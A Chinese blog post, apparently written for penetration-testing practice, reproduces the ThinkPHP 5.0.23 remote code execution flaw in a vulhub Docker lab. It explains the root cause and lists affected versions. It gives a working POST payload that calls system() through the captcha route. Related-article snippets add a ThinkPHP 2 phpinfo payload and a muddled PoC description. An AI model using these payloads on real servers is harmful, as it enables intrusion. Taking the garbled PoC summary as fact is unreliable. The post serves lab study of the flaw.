ThinkPHP--5.0.23-rce远程代码执行

最新推荐文章于 2024-05-13 09:42:57 发布
最新推荐文章于 2024-05-13 09:42:57 发布
阅读量409 收藏 9
点赞数 12
文章标签: 服务器 web安全 linux 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/138239482
版权

一、漏洞原理

实现框架的核心类Requests的method方法实现表单请求类伪装,默认为$_POST[‘_method’]变量,却没有对_method属性进行严格校验,可以通过变量覆盖Requests类的属性,在结合框架特性实现对任意函数的调用实现任意代码执行。

攻击者可向缓存文件内写入PHP代码,导致远程代码执行。

二、影响版本

ThinkPHP 5.0.x ~ 5.0.23

ThinkPHP 5.1.x ~ 5.1.31

ThinkPHP 5.2.0beta1

三、漏洞复现

1.运行此靶场

sudo docker-compose up -d

2.查看启动环境

sudo docker ps

3.访问网页寻找漏洞点

http://192.168.83.136:8080/index.php?s=captcha

在ThinkPHP框架中,http://192.168.83.136:8080/index.php?s=captcha 这个URL通常用于访问一个生成验证码图片的页面。这里的URL参数 s=captcha 指定了要执行的模块和操作,具体来说:

  • s 通常代表模块(Module)和操作(Action)的组合。在ThinkPHP中,s 参数通常用于路由到特定的控制器方法。
  • captcha 指的是验证码模块或操作。在ThinkPHP中,captcha 通常是一个内置的功能,用于生成和验证验证码。

当你访问这个URL时,服务器会执行与 captcha 相关的代码,生成一个验证码图片,并将其发送到你的浏览器。这个图片通常包含一些随机字符,用于验证用户输入的正确性,以防止自动化脚本或机器人的恶意行为。

在ThinkPHP中,你可以通过配置来定制验证码的样式、字符集、长度等属性。同时,你也可以在表单验证时使用这个验证码来确保用户输入的是正确的验证码

Hackber,POST上传

_method=__construct&filter[]=system&method=get&get[]=whoami

修改system执行的语句

sudo docker-compose down

小春学渗透
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2039
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
Thinkphp框架漏洞--->5.0.23 RCE
huohaowen的博客
03-01 1269
本篇文章来讲一下thinkphp的框架漏洞
漏洞复现-thinkphp2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞
qq_59350385的博客
03-24 590
目录 一、2-RCE 漏洞详情 1.构造poc?s=/a/b/c/${phpinfo()} 2. 使用蚁剑连接地址为: 二、5-RCE 漏洞原因: 1,访问 三、5.0.23-RCE 漏洞原因 1.利用system函数远程命令执行,利用bp抓包,修改请求方式,使用poc进行攻击: 一、2-RCE 漏洞详情 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规.
buuctf-Real-[ThinkPHP]5.0.23-Rce
weixin_46079186的博客
05-09 607
题目地址 和前两题一样,去找poc 找到poc ,使用查看一下效果有回显。 根据前两题经验,flag肯定在phpinfo 里面 ,所以直接修改一下,拿到flag
thinkphp漏洞复现】2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1469
参考文章:https://blog.csdn.net/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
buuctf [ThinkPHP]5.0.23-Rce
qq_1873822的博客
03-14 1125
poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.
vulhub系列之thinkphp(2-rce5.0.23-rce、5-rce、in-sqlinjection)
小城的博客
12-24 913
目录thinkphp 2-rce5.0.23远程代码执行 大家好,我是小城,一个刚刚起步的学渣,笨鸟先飞,可惜我领悟得太晚。但从现在开始,我会努力加油进取变强! thinkphp 2-rce 0x01 漏洞原理 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)
【vulhub】thinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 348
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
Thinkphp5.0.23 rce远程代码执行
Lucky1youzi的博客
01-20 862
Thinkphp5.0.23 rce远程代码执行
thinkphp-bjyblog 开源博客系统 v1.1
10-11
闲暇之时使用thinkphp开发了一个个人博客用来整理技能知识; 如今博客的功能基本已经齐备;特开源以供各类猿们使用; 亦可以作为初学thinkphp的同学们的参考源代码; 此博客程序
ThinkPHP-request函数远程代码执行1
08-03
library/think/Request.php:541-603 isGet isPost isPut isDelete isHeadpublic funct
漏洞通告ThinkPHP远程代码执行漏洞
05-05
【漏洞通告】ThinkPHP远程代码执行漏洞
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
处理HTTP请求的服务器
kjl536566的博客
05-10 358
HTTP服务器的主要作用包括提供Web服务,如网页、图片、视频、文件等静态资源的访问和下载。此外,HTTP服务器还可以处理动态请求,实现数据交互和功能调用。同时,HTTP服务器还可以提供访问控制和安全性保护,实现负载均衡和高可用性,以及记录日志和监控系统运行情况。完整的Web应用还包括前端代码(如HTML、CSS和JavaScript)、后端代码(如处理HTTP请求的服务器代码)以及数据库等组件。处理HTTP请求的服务器,通常被称为HTTP服务器Web服务器
Jtti:哪些方法可以降低美国CN2服务器的延迟?
JttiSEO的博客
05-10 271
综上所述,通过选择优质的网络提供商、优化网络路由、使用CDN服务、优化服务器配置和性能、使用加速技术和协议以及减少网络拥塞和负载等方法,可以有效降低美国CN2服务器的延迟,提高网络性能和用户体验。1.选择优质的网络提供商和服务商:选择具有高质量网络和优质服务的网络提供商和服务商是降低延迟的关键。确保您选择的网络提供商具有可靠的基础设施和优质的网络连接,以提供稳定的网络连接和较低的延迟。2.优化网络路由:通过优化网络路由和选择优质的网络路径,可以减少数据包传输的跳数和延迟。
应用层(上篇)
最新发布
m0_73280507的博客
05-13 904
应用程序体系结构: 由应用程序研发者设计规定了如何在各种端系统上组织该应用程序。在选择应用程序体系结构时,应用程序研发者很可能利用现代网络应用程序中所使用的两种主流体系结构之一:客户-服务器体系结构或对等(P2P)体系结构。客户-服务器体系结构:打开的主机称为服务器,它服务于来自许多其他称为客户的主机的请求。
解决离线服务器无法加载HuggingFaceEmbeddings向量化模型的问题
m0_58700887的博客
05-10 1016
也就是说加载完向量化模型后,我初始化了Chroma向量数据库,然后对传入的doc文档数据进行向量化,它会提示找不到embed_documents这个属性。本身BertModel是没有这个属性的,但是Chroma却需要调用这个属性来实现文档向量化(通过HuggingFaceEmbeddings来加载模型就不会报错,但是离线服务器上用不了)。最后再调用这个类,就能正常对文档进行向量化和本地持久化了。
poc-yaml-thinkphp5023-method-rce poc1
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行解析漏洞,攻击者可以利用该漏洞在服务器执行任意命令。poc-yaml-thinkphp5023-method-rce 是一个利用该漏洞的示例程序。 通过 poc1 工具,攻击者可以利用 YAML 文件解析的漏洞,实现远程代码执行。攻击者通过构造恶意 YAML 文件,并将其作为参数发送给目标应用的接口,从而触发代码执行。 该漏洞的危害性很高,攻击者可以在受影响的应用上执行任意命令,例如查看、修改或删除敏感文件,创建新用户账户,获取数据库信息等。这可能导致严重的安全风险和数据泄露。 为了防止此漏洞的利用,建议使用 ThinkPHP 的最新版本,并及时更新框架。此外,应开启严格的访问控制,限制对敏感函数和文件的访问。同时,将任何用户输入数据进行严格过滤和验证,以防止注入攻击。最重要的是,及时关注和安装安全补丁,保持应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值